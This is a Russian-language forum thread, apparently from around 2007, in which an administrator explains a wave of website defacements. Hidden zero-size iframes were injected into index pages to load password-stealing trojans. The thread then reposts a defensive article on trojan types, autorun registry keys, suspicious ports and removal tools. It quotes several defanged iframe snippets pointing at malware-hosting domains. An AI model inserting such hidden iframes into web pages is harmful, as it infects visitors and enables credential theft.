RE: Вирусы и всё о них - Форум - Portal.Lg.Ua:) Украинский портал. Интересные Новости. Цікаві новини. Коротко о самом интересном.
Пользовательского поиска
Portal.Lg.Ua:) Украинский портал. Интересные Новости. Цікаві новини.  Коротко о самом  интересном.
Курс валют

 25,14    27,85    0,38
Облако тегов

Доска объявлений.
Авто из США
Chevrolet (07.05.2019)
Ювелирные украшения
Прочее (19.11.2018)
В Украине продаём облицовочный кирпич «Литос».
Стройматериалы (29.08.2017)


 
= Ad with Photo
RSS-канал

IT-новости
Авто-авиа новости
Игры
Интим
Медицина
Это Интересно
Кулинарная азбука
Мир Моды
Мобильные новости
Музыка, кино
Научные новости
Неопознанное
Новости в мире
Новости в Украине
Про женщин
Про мужчин
Проишествия
Спорт

Все новости
Авторизация
Portal.Lg.Ua:) Украинский портал. Интересные Новости. Цікаві новини. Коротко о самом интересном. © 2019
planeta
Форум
Добро пожаловать, Гость
Привет! Вход или Регистрация.    Забыли пароль?
RE: Вирусы и всё о них (0 просматривает) 
Вниз Ответить Избранное: 0
Сообщения темы: RE: Вирусы и всё о них
#148
doctor (Администратор)
The way of tea
Администратор
Постов: 79
graphgraph
Пользователь в онлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской
Вирусы и всё о них 12 г., 1 мес. назад Репутация: 0  
Новый троян, похищающий пароли доступа

и не определяющийся антивирусными программами

Как бороться с прокатившейся эпидемией изменения индексных страниц сайтов?


Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.

Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги .

Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.

Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:

_i_frame__ src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" _frame_border="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или _i_frame__ src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /_i_frame__
или другой сайт
Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку . Тег _i_frame__, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере ) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.

Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).
Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.

Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.

Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".

Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.
Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.

Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите

Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.

Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега '_i_frame__' с атрибутами "width="0" height="0" или width="1" height="1".

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla.

Если с Вами произошла эта неприятность, то как от нее избавиться читайте следующий пост форума:


Сообщение отредактировано: doctor, в: 2007/07/06 13:38

Читайте также:

 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
#149
doctor (Администратор)
The way of tea
Администратор
Постов: 79
graphgraph
Пользователь в онлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской
Очистка Вашего компьютера от вирусной нечисти 12 г., 1 мес. назад Репутация: 0  
Советы

Буквально несколько месяцев назад началась непонятная эпидемия в Интернет: пропадали индексные страницы сайтов, на них добавлялись ссылки, с которых загружались вирусы, уводились аськи и почтовые адреса. Очень много претензий ставилось к провайдерам, но все вышеизложенное было действием вирусов-троянов, которые совсем недавно появились или были модифицированы. Причем, самое странное - ни антивирусные программы, ни файерволлы не могли противостоять этой заразе.

Часто бывает случай, когда вирус нельзя обнаружить из-за того, что он модифицирует браузер Internet Explorer и прописывает свою библиотеку, как "родную". Тут уже не поможет даже firewall, так как украденная информация трояном передается по протоколу http и ее невозможно отследить. Если у Вас поменян или не работает Интернет Эксплорер, попробуйте воспользоваться утилитой HaxFix, которая обнаружит, подвергался ли ваш ослик IE модификации и посоветует, что нужно сделать.

Удалось найти еще одну небольшую программку, которая, судя по названию, проверяет наличие вирусов-троянов по их распространенным именам. В результате ее работы формируется файл протокола, где указывается, в каких местах операционной системы нужно вычистить троянцев. Очистка производится вручную. Сразу хочу заметить, что файл iedw.exe, который программа определяет как Trojan Downloader (загрузчик троянов) относится к родным файлам ОС Виндовс. То есть - возможно, это и загрузчик, но он разработан корпорацией Мелкософта и удалять его нужды нет .

Если на Вашем компьютере не установлено никакой антивирусной программы, или стоит бесплатная типа AVG, NOD32 или что-нибудь подобное, то у Вас есть два варианта.

Тут возможны два варианта - или Вы даете доступ к диску своего компьютера и Вам в онлайне проверяют его на вирусы, или с помощью Kaspersky Online Scanner или закачиваете им файл, чтобы они его проверили у себя (Kaspersky file Scanner). Если Вы хотите месяц попользоваться антивирусом Касперского для ознакомления, тогда зайдите на страницу
http://www.kaspersky.ru/trials и скачайте оттуда ПОЛНОФУНКЦИОНАЛЬНУЮ версию антивируса.
Любимый мной Доктор Веб (DrWeb) лаборатории Данилова стал настолько коммерческим, что и не знаю, предоставляет ли он что-то подобное. Вроде, после скачивания программы есть возможность получить демонстрационный ключ на 10 дней, но утверждать не берусь. Если у вас есть подозрительный файл, можете отправить его через форму на странице
http://www.drweb.ru/scan/ чтобы проверить on-line на вирусы (размер файла не должен превышать 12Mb).

Что еще сказать? Размер дистрибутива антивируса Касперского составляет около 20 Мб, ДрВеб - около 10 Мб. Сравнивать их в работе? Касперский немного тяжелее, постоянно сыплет сообщениями, но, вроде. работает надежно. DrWeb легче, табличка с предупреждением вылетает только при перехвате вируса, есть эвристический анализ, но...
Он мне, гад, на комп пропустил этот троян....

Читайте также:

 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
#167
doctor (Администратор)
The way of tea
Администратор
Постов: 79
graphgraph
Пользователь в онлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской
Как защитить свой комп и нервы от троянов ? 11 г., 11 мес. назад Репутация: 0  
На сайте http://www.nestor.minsk.by обнаружил интересную статью Бойцева О.М. "Защити свой ПК от троянов!"

Исходя из описанных в ней советов действительно можно очистить свой ПК от троянов и другой нечисти. Привожу полное содержание статьи:

По греческому преданию, после долгих лет осады ахейцы, отступая от Трои, оставили в подарок ее жителям огромного деревянного коня. Троянцы как дар ввезли его в город. Ночью спрятавшиеся в коне воины убили часовых и открыли ворота в город, чтобы впустить основное войска. С тех пор выражение "троянский конь" стало нарицательным (дар врагу, чтобы погубить его). Сегодня мы поговорим с вами о троянах. Что это такое, какими они бывают, как можно подхватить эту заразу и как уберечься от нее. И, наконец, самое главное: что делать, если вы все-таки стали жертвой троянского коня.

Сразу следует сделать маленькое, но существенное уточнение. Троян - это не одно и то же, что вирус. В отличие от вирусов, которые в основном сносят Винду и форматируют диски, трояны по своей сути существа мирные. Сидят себе тихонько и делают свое черное дело: Область их компетенции - воровство конфиденциальной информации, паролей с последующей передачей всего этого добра хозяину. В классическом варианте троян состоит из клиента и сервера. Серверная часть обычно на компе у жертвы, клиентская - у хозяина, т.е. у того, кто создал троян или просто модифицировал его, заставив работать на себя. Связь клиента и сервера осуществляется через какой-либо открытый порт. Протокол передачи данных - обычно TCP/IP, но известны трояны, которые используют и другие протоколы связи - в частности, ICMP и даже UDP. Тот, кто создает трояны, умело маскирует их. Один из вариантов - замаскировать троянского коня под какую-либо полезную программу. При ее запуске вначале происходит выполнение кода трояна, который затем передает управление основной программе. Троян также может быть просто, но эффективно замаскирован под файл с любым дружественным расширением - например, GIF.

Какими они бывают:

Современная классификация троянов выглядит следующим образом:
1. Программы-шпионы типа Mail sender.
2. Утилиты удаленного администрирования - BackDoor.
3. Программы-дозвонщики - Dialer.
4. Кейлоггеры - KeyLogger.
5. Эмуляторы DDos-атак.
6. Загрузчики - Downloader.
7. Дропперы - Dropper.
8. Прокси-серверы.
9. Деструктивные троянские программы (есть и такие - напр., FlashKiller).

Первая группа - Mail Sender - наиболее распространена, т.к. подавляющее большинство троянов, если не все, отсылают хозяину пароли от Интернета, вашей электронной почты, ICQ, чатов, ну, и т.д. в зависимости от изобретательности троянмейкера. Примеры: Trojan-PSW.Win32.QQPass.du (китайский троян, ворующий Windows-пароли), Bandra.BOK (скачивается на компьютер жертвы при посещении определенного сайта и пытается украсть пароли от определенных банковских сайтов), Bancos.LU (сохраняет пароли во временных файлах, а затем пытается отослать их хозяину), Banker.XP (собирает конфиденциальные данные, пароли, счета и т.д., отправляя их на определенный адрес):

Утилиты удаленного администрирования - backdoor (дословно "потайная дверь") - обычно обладают возможностями Mail Sender'а плюс функциями удаленного управления компьютером. Такой троян ждет соединения со стороны клиента (соединение осуществляется через какой-либо порт), с помощью которого посылаются команды на сервер. Примеры: Backdoor.Win32.Whisper.a - троянская программа со встроенной функцией удаленного управления компьютером, знаменитый Back Orifice, позволяющий постороннему контролировать ваш ПК, как свой. Созданный группой хакеров Cult of Dead Cow, он, несмотря на аскетичный интерфейс, позволяет постороннему по локальной сети или Internet получить возможность полного контроля над вашим компьютером, полного доступа к вашим дискам, наблюдения за содержимым экрана в реальном времени, записи с подключенного к системе микрофона или видеокамеры и т.п. Самый интересный пример из этого списка - пожалуй, RADMIN, который определяется Symantec Antivirus как самый настоящий троян.

Программы-дозвонщики отличаются тем, что могут нанести жертве значительный финансовый урон, устанавливая соединение с зарубежным интернет-провайдером. Таким образом, с телефонного номера абонента происходит установление "незаказанного" международного соединения, например, с островами Кука, Сьерра-Леоне, Диего-Гарсиа или другим диковинным регионом в зависимости от чувства юмора создавшего программу. Примеры: Trojan- PSW.Win32.DUT или trojan.dialuppasswordmailer.a; Trojan-PSW.Win32.Delf.gj; not-a-virusSWTool.Win32.DialUpPaper; not-a-virusornWare.Dialer.RTSMini.

Трояны-кейлоггеры удачно сочетают в себе функции кейлоггера и обычного Send-Mailer'а. Они способны отслеживать нажатия клавиш клавиатуры и отсылать эту информацию злонамеренному пользователю. Это может осуществляться по почте или отправкой прямо на сервер, расположенный где-либо в глобальной сети. Примеры: Backdoor.Win32.Assasin.20.; Backdoor.Win32.Assasin.20.n; Backdoor.Win32.BadBoy; Backdoor.Win32.Bancodor.d (keylogger.trojan).

Эмуляторы DDos (Distributed Denial of Service) - довольно интересная группа троянов. Серверная часть слушает определенный порт и, как только получает команды извне, начинает функционировать как нюкер (Nuker - приложение, отсылающее на заданный IP шквал некорректно сформированных пакетов, что приводит к эффекту, известному как отказ в обслуживании).

Загрузчики - Downloader. Это троянские программы, загружающие из Интернета файлы без ведома пользователя. Загружаемое может быть как интернет-страницами нецензурного содержания, так и просто вредоносным ПО. Примеры: Trojan-Downloader.Win32.Agent.fk (представляет собой Windows PE EXE файл. Размер зараженных файлов существенно варьируется. После запуска троянец создает папку под названием %Program Files%Archive, после чего копирует себя в нее и т.д. Троянская программа Trojan-Downloader.Win32.Small.bxp первоначально была разослана при помощи спам-рассылки. Представляет собой Windows PE EXE файл, имеет размер около 5 Кб. Упакована FSG. Размер распакованного файла - около 33 Кб.

Дропперы (Dropper) - Троянские программы, созданные для скрытной установки в систему других троянских программ. Пример: Trojan-Dropper.Win32.Agent.vw.

Proxy-серверы - троян устанавливает в вашу систему один из нескольких proxy-серверов (socks, HTTP и т.п.), а затем кто угодно, заплатив хозяину трояна, либо сам троянмейкер совершает интернет-серфинг через этот proxy, не боясь, что его IP вычислят, т.к. это уже не его IP, а ваш:

Деструктивные троянские программы, помимо своих непосредственных функций сбора и отсылки конфиденциальной информации, могут форматировать диски, "сносить" Винду и т.д.

Как подхватить заразу?

Способы заражения не новы, но именно они и являются воротами для нечисти в ваш ПК:
Через Internet (самый обычный способ - когда юзер качает из нета проги). Очень часто под безобидным ускорителем браузера может сидеть троян. С помощью всеми нами любимого "мыла"- самый распространенный способ заражения. Несмотря на многочисленные предупреждения, прогрессирует благодаря методам социальной инженерии. Прикрепленный файл, даже если он выглядит как картинка, может быть удачно замаскированной троянской программой.
Через дискету или CD-диск. Довольно распространенный способ заражения. По статистике юзеры проверяют дискеты чаще, чем диски, если не сказать более: CD-диски обычно не проверяют вообще. А зря: Ведь именно пиратские диски (никто не будет отрицать, что таких у нас большинство) - не самое слабое звено в канале распространения деструктивных программ. Почему, когда WIN95.CIH пронесся над Европой и Азией, оказалось, что инфицировано около миллиона машин, а в США - всего 10 тысяч? Распространялся этот вирус через нелегальное ПО, скопированное на CD-диски.

Изобретательность вирусописателей не знает границ. Сам лично поймал "на живца" следующего зверя - "Trojan horse.Bat.Format C", который сидел в программном коде Trojan Remover'а(!). Разобраться в таких случаях бывает нелегко. Правильность заключения можно проверить, лишь дезассемблировав такую программу. Довольно оригинальный способ заражения - через autorun при вставке диска в дисковод. Как вы уже догадались, autorun.exe в данном случае выступает в довольно оригинальной роли.

Найти и обезвредить!

Если ваш антивирус упорно молчит, а возможность присутствия трояна высока, то попробуйте обнаружить шпиона, воспользовавшись специальными утилитами типа Trojan Remover и т.п. Как показывает практика, этот способ доступен даже самому неопытному пользователю ПК, тем более, что соответствующего софта в Интернете более чем достаточно. Но об этом поговорим позже. А сейчас постараемся разобраться в том, как можно удалить троян вручную.
Для своего запуска троянская программа обычно прописываются на автозапуск в следующих ветвях реестра:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun (чаще всего сюда)
Кроме этой ветви, еще следует заглянуть:
HKEY_CURENT_USERSoftwareMicrosoftWindowsCurrentVersionRun;
HKEY_CURENT_USERSoftwareMicrosoftWindowsCurrentVersionRunonce;
HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersionRun;
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunonce;

При обнаружении неизвестной записи, т.е. той, которая не принадлежит нормальным приложениям (для того, чтобы с легкостью обнаруживать "засыльного", советую вам изучить данные ветви реестра в чистой системе и найти соответствия запись/приложение), смело удаляйте ее. Думаю, не грех лишний раз напомнить, что при работе с реестром следует придерживаться особой аккуратности. Следует также просмотреть все, что прописано в автозагрузке. Для этого в консоли "выполнить" набираем msconfig, далее переходим на закладку "автозагрузка". Операции разрешение/запрет на автозагрузку конкретной программы интуитивно просты. Просто убираем галочку с программы, вызывающей у вас сомнение, и ее запуск при следующей загрузке Винды блокируется. Советую вам внимательно следить за своими драйверами и программами, прописанными в автозагрузку - тогда у вас будет намного больше шансов моментально определить трояна. Если троян все же запустился, для начала следует распознать его и завершить процесс, ему принадлежащий, воспользовавшись Ctrl+Alt+Del. Однако, даже если вы не обнаружили его в процессах диспетчера задач, огорчаться не стоит. Полную информацию о запущенных в Windows программах можно увидеть, запустив утилиту XRun или ей подобную - CTask. Для того чтобы не перепутать своих/чужих, советую изучить список типичных процессов диспетчера задач.

Если вышеизложенные способы ничего не дали, а признаки троянизации налицо (слишком большой трафик, непонятные процессы в оперативной памяти, тормоза и глюки), то пришло, как говорят, время для плана Б. Необходимо просканировать ваш ПК извне на наличие открытых портов. Все, что вам понадобится для такой операции - это хороший сканер портов и ваш IP. Данная процедура высокоэффективна, и с ее помощью выявляются даже самые скрытные и хитрые трояны. Из сканеров могу посоветовать X-Spider, который является лучшим сканером для подобных дел. Если у вас открыты нестандартные порты, то есть о чем задуматься: и прикрыть это дело в настройках вашего брандмауэра.

Ниже приведен список подозрительных портов:
port 23 - Tiny Telnet Server (= TTS)
port 25 - Ajan, Antigen, Email Password Sender, Haebi Coceda , Happy 99, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
31-Master Paradise
121-BO jammerkillahV
456-HackersParadise
555-Phase Zero
666-Attack FTP
1001-Silencer
1001-Silencer
1001-WebEx,
1010-Doly Trojan 1.30 (Subm.Cronco)
1011-Doly Trojan 1.1+1.2
1015-Doly Trojan 1.5 (Subm.Cronco)
1033-Netspy
1042-Bla1.1
1170-Streaming Audio Trojan
1207-SoftWar
1243-SubSeven
1245-Vodoo
1269-Maverick's Matrix
1492-FTP99CMP
1509-PsyberStreamingServer Nikhil G.
1600-Shiva Burka,
1807-SpySender,
6669-Vampire 1.0
6670-Deep Throat
6883-DeltaSource (DarkStar)
6912-Shitheep
6939-Indoctrination
7306-NetMonitor
7789-iCkiller
9872-PortalOfDoom
9875-Portal of Doom
9989-iNi-Killer
9989-InIkiller
10607-Coma Danny
11000-SennaSpyTrojans
11223-ProgenicTrojan
12076-Gjamer
12223-Hack?99 KeyLogge
12346-NetBus 1.x (avoiding Netbuster)
12701-Eclipse 2000
16969-Priotrity
20000-Millenium
20034-NetBus Pro
20203-Logged!
20203-Chupa cabra
20331-Bla
21544-GirlFriend
21554-GirlFriend
22222-Prosiak 0.47
23456-EvilFtp
27374-Sub-7 2.1
29891-The Unexplained
30029-AOLTrojan1.1
30100-NetSphere
30303-Socket25
30999-Kuang
31787-Hack'a'tack
33911-Trojan Spirit 2001 a
34324-Tiny Telnet Server
34324-BigGluck TN
40412-TheSpy
40423-Master Paradise
50766-Fore
53001-RemoteWindowsShutdown
54320-Back Orifice 2000 (default port)
54321-Schoolbus 1.6+2.0
61466-Telecommando
65000-Devil 1.03

Как вы уже догадались, в данном списке портов в основном те, которые используются шпионскими программами.

Software против троянов

Для обнаружения и удаления троянов существует целый арсенал соответствующего софта. Вот лишь та малая часть, которая, как я надеюсь, поможет защитить ваш ПК от всевозможного рода шпионов.

Advanced Spyware Remover
Утилита, предназначенная для защиты персонального компьютера от вредоносных программ и шпионских модулей. Она позволяет избавиться от рекламных программ, дозвонщиков, программ-шпионов, кейлоггеров, троянов и т.д. Advanced Spyware Remover проверяет системный реестр на наличие в нем ключей, принадлежащих вышеперечисленным типам вредоносных программ. Ее главной отличительной особенностью перед аналогами является высокая скорость работы сканера и обновляемая антишпионская база сегментов вредоносного кода F-Secure BlackLight.

SpyDefense 0.9.5.118 Beta
Программа для обнаружения шпионских модулей. Позволяет найти и обезвредить большое количество компьютерных шпионов.

Advanced Spyware Remover 1.73.20134
Утилита, предназначенная для защиты персонального компьютера от вредоносных программ и шпионских модулей. Позволяет избавиться от рекламных программ, дозвонщиков, программ-шпионов, кейлоггеров, троянов и т.д.

WinPatrol 9.8.1.0
Программа, предназначенная для повышения безопасности ОС Windows. Отслеживает и уничтожает различные шпионские модули и вредоносные программы типа Adware и Spyware.

Arovax Shield 1.2.314
Утилита, предназначенная для защиты от программ-шпионов. Arovax Shield позволяет в режиме реального времени следить за безопасностью системы, предупреждая пользователя о проникновении в нее всевозможных паразитов посредством сети Интернет.

Arovax AntiSpyware 1.0.353
Утилита для удаления программ-шпионов. На сегодняшний день в ее антишпионской базе содержится свыше 33 тысяч сегментов вредоносного кода.

Microsoft AntiSpyware 1.0.701
Система для борьбы с вредоносными программами и шпионскими модулями разработки Microsoft. Как утверждает разработчик, утилита держит под контролем более 50 так называемых spyware-путей, по которым в компьютер могут попасть шпионские модули.

Trend Micro CWShredder 2.19
Утилита для нахождения и удаления шпионских программ. Позволяет обнаружить следы присутствия на ПК так называемых Cool Web Search программ (их относят к вирусам-троянам).

a-squared HiJackFree 1.0.0.19
Утилита, предназначенная для детального анализа системы по различным параметрам, касающимся безопасности. Программа может быть полезна для определения и удаления из компьютера практически всех типов HiJackers, Spyware, Adware, Trojans и Worms.

Указанные программы можно скачать в Интернете указав в поисковике название софта.

SpyRemover - неплохая программа для поиска шпионских модулей. SpyRemover распознает более 27.500 типов вредоносных программ (spyware, adware, hijackers, keyloggers, Trojans и т.д.). В ней имеется возможность автообновлений.

XSpy Shield Gold - это мощная программа, которая поможет вам защититься от spyware-модулей, которые присутствуют в некоторых программных продуктах и других шпионских модулях и могут представлять угрозу безопасности вашей операционной системы.

Anti-keylogger - утилита для операционных систем семейства Windows 2k/XP, защищающая от программных кейлоггеров(программ, которые фиксируют все нажатия клавиш на клавиатуре, а значит, могут позволить злоумышленнику узнать все набираемые вами пароли).

CounterSpy - аналог программы Ad-aware. Позволяет удалить шпионские модули с вашего компьютера.

Spy Sweeper - неплохая программа для защиты ПК от spyware (шпионских) модулей, а также от троянов и кейлоггеров.

HookMonitor предназначена для администрирования процесса установки глобальных ловушек на клавиатуру. Выявляет и блокирует модули различного spyware, ведущие наблюдение за набором паролей и т.п.

Browser Sentinel постоянно наблюдает за уязвимыми зонами системы на предмет обнаружения вредоносных компонентов. Она уведомит вас и поможет удалить программы-шпионы, рекламное ПО, клавиатурных шпионов, программы автодозвона и прочих непрошеных гостей.

Microsoft Windows AntiSpyware 1.0.614 beta - это программа для обнаружения и удаления из системы разнообразных нежелательных модулей: отслеживающих интернет-предпочтения, добавляющих всплывающие рекламные окна, вносящих несанкционированные изменения в интернет-настройки. В заключение хотелось бы отметить, что широкое распространение троянских коней было, есть и будет. И тому есть много причин.

Троянские программы являются мощным инструментом получения конфиденциальной информации, кражи личных данных, наживы за чужой счет. Для того чтобы остановить трояна, в одних случаях бывает достаточно Spy Remover'а и ему подобных программ, в других - вашего антивируса. Но только комплексное применение методов защиты обеспечит безопасность вашей системы.

Читайте также:

 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
#3806
Nelya (Пользователь)
Юниор
Постов: 12
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
RE: Вирусы и всё о них 11 мес., 3 нед. назад Репутация: 0  
 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
#10126
Mayser (Пользователь)
Писатель
Постов: 56
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
RE: Вирусы и всё о них 3 мес. назад Репутация: 0  
 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
#10217
panbeg (Пользователь)
Юниор
Постов: 9
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
RE: Вирусы и всё о них 3 мес. назад Репутация: 0  
 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
Вверх Ответить
Последние новости

Регистрация доменных имен, хостинг! 

Яндекс.Метрика

Выбор Portal.Lg.Ua - NATO
Ответственность за содержание публикации полностью ложится на источник информации (см.«Сайт Источника. Администрация портала Ukrwebmir Net может не разделять мнение автора.
пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅ www.femina.com.ua
            пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅ       Rambler's Top100       Rambler's Top100      
Copyright © 2006 - 2018
Компания вебдизайна Интернет технологий "Планета-плюс"